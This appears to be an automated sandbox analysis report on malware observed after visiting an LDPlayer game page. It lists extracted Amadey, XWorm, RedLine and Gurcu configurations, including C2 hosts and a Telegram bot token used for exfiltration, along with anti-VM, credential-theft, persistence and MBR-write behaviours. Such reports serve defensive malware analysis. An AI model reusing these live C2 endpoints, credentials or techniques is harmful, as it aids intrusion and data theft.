Resubmissions
21-08-2024 15:58
240821-telnna1dll 1028-04-2024 21:00
240428-ztplrahd7z 1028-04-2024 20:59
240428-zs72pshd6t 128-04-2024 13:04
240428-qaxctagd66 10Analysis
-
max time kernel
1185s -
max time network
1191s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
21-08-2024 15:58
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://www.ldplayer.net/games/among-us-on-pc.html
Resource
win10v2004-20240802-en
General
-
Target
https://www.ldplayer.net/games/among-us-on-pc.html
Malware Config
Extracted
amadey
4.41
fed3aa
http://185.215.113.16
-
install_dir
44111dbc49
-
install_file
axplong.exe
-
strings_key
8d0ad6945b1a30a186ec2d30be6db0b5
-
url_paths
/Jo89Ku7d/index.php
Extracted
xworm
127.0.0.1:7000
beshomandotestbesnd.run.place:7000
-
Install_directory
%Userprofile%
-
install_file
USB.exe
-
telegram
https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672
Extracted
redline
NEW TEST
beshomandotestbesnd.run.place:46717
Extracted
gurcu
https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x0007000000024210-11853.dat family_xworm behavioral1/memory/2420-11867-0x0000000000550000-0x000000000056C000-memory.dmp family_xworm -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
resource yara_rule behavioral1/memory/2420-12141-0x000000001CF80000-0x000000001CF9E000-memory.dmp family_redline -
SectopRAT payload 1 IoCs
resource yara_rule behavioral1/memory/2420-12141-0x000000001CF80000-0x000000001CF9E000-memory.dmp family_sectoprat -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Process not Found Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Process not Found Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Process not Found Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Process not Found Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Process not Found Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Process not Found -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 9784 Process not Found 4576 Process not Found 6092 Process not Found 4344 Process not Found -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 12 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Process not Found -
Checks computer location settings 2 TTPs 62 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation SWUpdater.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation Wave Browser.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation random.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation SWUpdater.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation SWUpdater.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation wavebrowser.exe -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk Process not Found File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk Process not Found -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 64 IoCs
pid Process 3160 Wave Browser.exe 868 Wave Browser.exe 4008 SWUpdaterSetup.exe 5664 SWUpdater.exe 4632 SWUpdater.exe 2148 SWUpdaterComRegisterShell64.exe 3980 SWUpdaterComRegisterShell64.exe 3432 SWUpdaterComRegisterShell64.exe 4324 SWUpdater.exe 5884 SWUpdater.exe 1324 SWUpdater.exe 4376 WaveInstaller-v1.5.18.2.exe 5376 setup.exe 2752 setup.exe 5772 setup.exe 3160 setup.exe 5428 wavebrowser.exe 5436 wavebrowser.exe 1032 wavebrowser.exe 5464 wavebrowser.exe 5508 wavebrowser.exe 6264 wavebrowser.exe 6332 wavebrowser.exe 6352 wavebrowser.exe 6964 SWUpdater.exe 6992 wavebrowser.exe 5076 wavebrowser.exe 6448 wavebrowser.exe 6476 wavebrowser.exe 6488 wavebrowser.exe 6528 wavebrowser.exe 6536 wavebrowser.exe 6408 wavebrowser.exe 2212 wavebrowser.exe 804 wavebrowser.exe 6548 wavebrowser.exe 5960 wavebrowser.exe 6864 wavebrowser.exe 6884 wavebrowser.exe 7016 wavebrowser.exe 6192 wavebrowser.exe 6456 wavebrowser.exe 6772 wavebrowser.exe 6780 wavebrowser.exe 2908 wavebrowser.exe 3552 wavebrowser.exe 6416 wavebrowser.exe 5884 wavebrowser.exe 6560 wavebrowser.exe 6352 wavebrowser.exe 6628 wavebrowser.exe 6984 wavebrowser.exe 6380 wavebrowser.exe 6960 wavebrowser.exe 6784 wavebrowser.exe 6908 wavebrowser.exe 6848 wavebrowser.exe 5884 wavebrowser.exe 6744 wavebrowser.exe 6380 wavebrowser.exe 6868 wavebrowser.exe 6512 wavebrowser.exe 6772 wavebrowser.exe 6864 wavebrowser.exe -
Identifies Wine through registry keys 2 TTPs 6 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Software\Wine Process not Found Key opened \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Software\Wine Process not Found Key opened \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Software\Wine Process not Found Key opened \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Software\Wine Process not Found Key opened \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Software\Wine Process not Found Key opened \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Software\Wine Process not Found -
Loads dropped DLL 64 IoCs
pid Process 5664 SWUpdater.exe 4632 SWUpdater.exe 2148 SWUpdaterComRegisterShell64.exe 4632 SWUpdater.exe 3980 SWUpdaterComRegisterShell64.exe 4632 SWUpdater.exe 3432 SWUpdaterComRegisterShell64.exe 4632 SWUpdater.exe 4324 SWUpdater.exe 5884 SWUpdater.exe 1324 SWUpdater.exe 1324 SWUpdater.exe 5884 SWUpdater.exe 5428 wavebrowser.exe 5436 wavebrowser.exe 5428 wavebrowser.exe 1032 wavebrowser.exe 5464 wavebrowser.exe 1032 wavebrowser.exe 5464 wavebrowser.exe 1032 wavebrowser.exe 1032 wavebrowser.exe 1032 wavebrowser.exe 1032 wavebrowser.exe 1032 wavebrowser.exe 1032 wavebrowser.exe 5508 wavebrowser.exe 6352 wavebrowser.exe 5508 wavebrowser.exe 6352 wavebrowser.exe 6332 wavebrowser.exe 6332 wavebrowser.exe 6964 SWUpdater.exe 6992 wavebrowser.exe 6992 wavebrowser.exe 6264 wavebrowser.exe 6264 wavebrowser.exe 5076 wavebrowser.exe 6448 wavebrowser.exe 5076 wavebrowser.exe 6448 wavebrowser.exe 804 wavebrowser.exe 5960 wavebrowser.exe 5960 wavebrowser.exe 6864 wavebrowser.exe 6864 wavebrowser.exe 6884 wavebrowser.exe 6884 wavebrowser.exe 7016 wavebrowser.exe 7016 wavebrowser.exe 6192 wavebrowser.exe 6192 wavebrowser.exe 6476 wavebrowser.exe 6476 wavebrowser.exe 6488 wavebrowser.exe 6528 wavebrowser.exe 6528 wavebrowser.exe 6548 wavebrowser.exe 6548 wavebrowser.exe 6456 wavebrowser.exe 6456 wavebrowser.exe 6772 wavebrowser.exe 6772 wavebrowser.exe 6780 wavebrowser.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wavesor SWUpdater = "\"C:\\Users\\Admin\\Wavesor Software\\SWUpdater\\1.3.135.0\\SWUpdaterCore.exe\"" SWUpdater.exe Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "C:\\Users\\Admin\\explorer" Process not Found -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SWUpdater.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SWUpdater.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SWUpdater.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SWUpdater.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SWUpdater.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SWUpdater.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SWUpdater.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SWUpdater.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SWUpdater.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SWUpdater.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SWUpdater.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SWUpdater.exe -
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 971 api.ipify.org 974 api.ipify.org 1624 ip-api.com 546 api.ipify.org 970 api.ipify.org -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 Process not Found -
Checks system information in the registry 2 TTPs 2 IoCs
System information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName wavebrowser.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer wavebrowser.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File created C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF Process not Found File created \??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF Process not Found File created C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF chrome.exe File created \??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF chrome.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
pid Process 5424 Process not Found 10040 Process not Found 8720 Process not Found 1480 Process not Found 5224 Process not Found 5784 Process not Found -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 8984 set thread context of 9696 8984 Process not Found 5500 -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1599783186\manifest.json wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_537332759\hyph-tk.hyb wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_81769832\LICENSE.txt wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1640646771\RW wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1640646771\LU wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1640646771\KM wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1640646771\CX wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1640646771\AE wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_537332759\hyph-en-us.hyb wavebrowser.exe File created C:\Program Files (x86)\Wavesor\Temp\GUM509C.tmp\SWUpdaterSetup.exe SWUpdaterSetup.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1640646771\TO wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1640646771\QA wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1640646771\KI wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1640646771\HU wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1640646771\GP wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1640646771\ES wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1640646771\CA wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_537332759\hyph-de-1996.hyb wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1640646771\KY wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1640646771\HK wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_2031500729\surnames.txt wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_5247098\manifest.fingerprint wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1640646771\TL wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1640646771\MA wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1640646771\CO wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_2031500729\us_tv_and_film.txt wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1640646771\TD wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1640646771\CY wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1640646771\AM wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1640646771\AD wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_2031500729\manifest.fingerprint wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_537332759\hyph-mn-cyrl.hyb wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1640646771\TJ wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1640646771\LI wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1640646771\KZ wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1640646771\IN wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_2031500729\male_names.txt wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1640646771\CF wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1640646771\BQ wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_101395709\kp_pinslist.pb wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_81769832\Filtering Rules wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1640646771\PG wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1640646771\MW wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1640646771\JE wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1640646771\GG wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1640646771\AR wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_537332759\hyph-lv.hyb wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_537332759\hyph-be.hyb wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1900903138\manifest.fingerprint wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1640646771\BB wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1599783186\_metadata\verified_contents.json wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1640646771\PY wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1640646771\PR wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1640646771\NZ wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1640646771\KH wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1640646771\GF wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1640646771\BW wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1640646771\CI wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_537332759\hyph-nl.hyb wavebrowser.exe File created C:\Program Files (x86)\Wavesor\Temp\GUM509C.tmp\SWUpdaterBroker.exe SWUpdaterSetup.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1640646771\YT wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1640646771\UA wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1640646771\TM wavebrowser.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5428_1640646771\KR wavebrowser.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\axplong.job Process not Found -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 29 IoCs
pid pid_target Process procid_target 5596 3260 Process not Found 5532 9788 4276 Process not Found 5533 6316 9832 Process not Found 5549 7696 5164 Process not Found 5573 1832 6196 Process not Found 5574 6844 5164 Process not Found 5573 9684 5164 Process not Found 5573 5400 5164 Process not Found 5573 9660 5164 Process not Found 5573 6316 5164 Process not Found 5573 9496 5164 Process not Found 5573 10028 6196 Process not Found 5574 8680 5164 Process not Found 5573 5388 6196 Process not Found 5574 9808 6196 Process not Found 5574 4080 6196 Process not Found 5574 4912 6196 Process not Found 5574 9268 6196 Process not Found 5574 10000 9488 Process not Found 5591 9240 9488 Process not Found 5591 3280 9488 Process not Found 5591 8980 9488 Process not Found 5591 7748 9488 Process not Found 5591 5104 9488 Process not Found 5591 5324 5164 Process not Found 5573 5532 9488 Process not Found 5591 1180 9488 Process not Found 5591 9280 9492 Process not Found 5608 4504 6196 Process not Found 5574 -
System Location Discovery: System Language Discovery 1 TTPs 26 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WaveInstaller-v1.5.18.2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdaterSetup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 